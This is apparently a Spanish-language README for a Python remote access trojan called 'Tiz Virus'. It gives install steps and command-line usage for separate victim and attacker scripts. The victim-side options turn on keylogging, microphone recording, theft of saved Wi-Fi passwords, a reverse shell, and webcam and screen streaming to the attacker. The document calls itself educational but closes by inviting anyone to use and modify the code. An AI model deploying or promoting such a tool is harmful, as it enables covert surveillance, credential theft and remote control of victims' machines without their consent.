python rat
Esta aplicación es para fines educativos. No puedo ser responsable de ningún uso abusivo de mi código.
pip3 install requirements.txt
En Windows, puedes simplemente iniciar victim_requirements.bat y/o attacker_requirements.bat, que descargan los requisitos.
Cuidado, los requisitos son diferentes para el atacante y la víctima.
en la computadora víctima: python3
en la computadora atacante: python3
Lado de la víctima:
usage : victim . py [ - h ] [ - - host HOST ] [ - - port PORT ] [ - - keylog KEYLOG ] [ - - micro MICRO ] [ - - wifi WIFI ] [ - - shell SHELL ]
[ - - camera CAMERA ] [ - - screen SCREEN ]
Tiz Virus Victim
optional arguments :
- h , - - help show this help message and exit
- - host HOST listening ip , default is '' , no need to change
- - port PORT default port is 5000 , revershell = port , camera stream = port + 1 , screen stream = port + 2
- - keylog KEYLOG keylog = t create a keylogger file / keylog = f don ' t create the file
- - micro MICRO micro = 10 record the microphone during 10 sec and put it in a file / micro = 0 don ' t record
- - wifi WIFI wifi = t create a file with all wifis password / wifi = f don ' t create the file
- - shell SHELL shell = t revershell on port ( default = 5000 ) / shell = f don ' t revershell
- - camera CAMERA camera = t stream camera on port + 1 ( default = 5001 ) / camera = f don ' t stream
- - screen SCREEN screen = t stream screen on port + 2 ( default = 5002 ) / screen = f don ' t stream
Lado atacante:
usage : attacker . py [ - h ] [ - - host HOST ] [ - - port PORT ] [ - - shell SHELL ] [ - - camera CAMERA ] [ - - screen SCREEN ]
Tiz Virus Attacker
optional arguments :
- h , - - help show this help message and exit
- - host HOST connecting ip , default is localhost '
- - port PORT default port is 5000 , revershell = port , camera stream = port + 1 , screen stream = port + 2
- - shell SHELL shell = t revershell on port ( default = 5000 ) / shell = f don ' t revershell
- - camera CAMERA camera = t stream camera on port + 1 ( default = 5001 ) / camera = f don ' t stream
- - screen SCREEN screen = t stream screen on port + 2 ( default = 5002 ) / screen = f don ' t stream
No soy nadie. Utilice este código, mejórelo, modifíquelo. No es necesario citar a nadie.